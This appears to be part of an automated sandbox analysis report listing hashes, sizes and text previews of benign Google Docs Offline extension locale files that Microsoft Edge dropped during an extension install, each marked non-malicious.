                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):937
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                          MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                          SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                          SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                          SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1337
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                          MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                          SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                          SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                          SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2846
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                          MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                          SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                          SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                          SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):934
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                          MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                          SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                          SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                          SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):963
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                          MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                          SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                          SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                          SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1320
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                          MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                          SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                          SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                          SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):884
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                          MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                          SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                          SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                          SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):980
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                          MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                          SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                          SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                          SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1941
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                          MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                          SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                          SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                          SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1969
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                          MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                          SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                          SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                          SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1674
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                          MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                          SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                          SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                          SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1063
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                          MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                          SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                          SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                          SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1333
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                          MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                          SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                          SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                          SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1263
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                          MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                          SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                          SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                          SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                          Malicious:false
